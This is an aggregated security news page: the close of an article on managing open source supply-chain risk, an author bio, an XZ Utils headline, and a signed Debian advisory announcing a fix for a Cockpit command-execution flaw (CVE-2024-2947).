"Mitigating exposure starts with shared understanding and acknowledgement in the C-suite and even at the board level that roughly 70% of the ingredients of the average software product are open source software historically created by mostly uncompensated contributors," Tidelift's Fischer says.  

New regulations and guidelines in the financial services industry, the FDA, and NIST will shape how software is developed in the years ahead and organizations need to prepare for them now. "Winners here will quickly adapt from a reactive strategy to a proactive strategy to managing open source-related risk," he says.

Fischer recommends that organizations get their security and engineering teams to identify how new open source components come into their environment. They should also define roles for monitoring these components and proactively remove ones that don't fit the company's risk appetite. "Reacting to late stage problems has become an ineffective way to deal with the scale of the risk to the business over the last several years, and the US Government is signaling that era is coming to an end," he says.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

XZ Utils Scare Exposes Hard Truths About Software Security

Debian Linux Security Advisory 5655-1 - It was discovered that Cockpit, a web console for Linux servers, was susceptible to arbitrary command execution if an administrative user was tricked into opening an sosreport file with a malformed filename.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5655-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffApril 04, 2024                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cockpitCVE ID         : CVE-2024-2947It was discovered that Cockpit, a web console for Linux servers, wassusceptible to arbitrary command execution if an administrative userwas tricked into opening an sosreport file with a malformed filename.For the stable distribution (bookworm), this problem has been fixed inversion 287.1-0+deb12u1.We recommend that you upgrade your cockpit packages.For the detailed security status of cockpit please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cockpitFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmYO+CkACgkQEMKTtsN8Tjah6w/+KMkDnUZXuYjUaF6XZLi05PEH8S60u4MYNu0kDIgNAaxfOvwJC9FiIOXfBWDA8q3GofBgAozeHpBIr/c654yn8mCu8/w6eX/j4eDK+5Obj+BGUBvBNxOt2hZK7rPmv7Dklz0mF0yFqGG9f+/MOT3HZU4tN4CZK37kbFUBvIbgf1X3vWVbJrdWBn/6yI6O7bogx4B0eG233Yc7jnSNTU6V2PfD9Eo8PpxwUnLB6ybgfhcgjmxbyTRp8UwKgfvon2XDI1BpcO7EJUf1XssNm7E7LdH8ZgWclOL7mHLym4nL9vOAPHY5ST1wfGlweTuvIYda/lOUc2Tu5K/r5YaWczVfNG4hhIAOAtJfHOAbog1+pJ73Ic4MPDCPkMyV994xEwyyFo5a1xJl5+BGnXjAuEQDJ8Jf7W9axI9TNqmsQusEt77jr17o0gDiX9JGidXh60sPLMoXO/SvzzI7Yw6SGOMBdu+q1QzoXezPa8ZU14ihXswbM/m01J8pg9abxA8RHVsyHMfF8L6YYbTLIqpMzhpDsxEeHF7MDvbMAMwKPLOM3nxZe4eC9/7glrHS5VHlWzpJ+V8H/ndCvCkkAKDTEEAxQEmrVDXJxP5hzRM4BtX4TlzAFWZDF/aw8CLw71x/Ene8Kp7SaNfNZfBhv9D2LZ95Eec38bFQoNT6+fphei3xv6M==cD4W-----END PGP SIGNATURE-----

Tag

#debian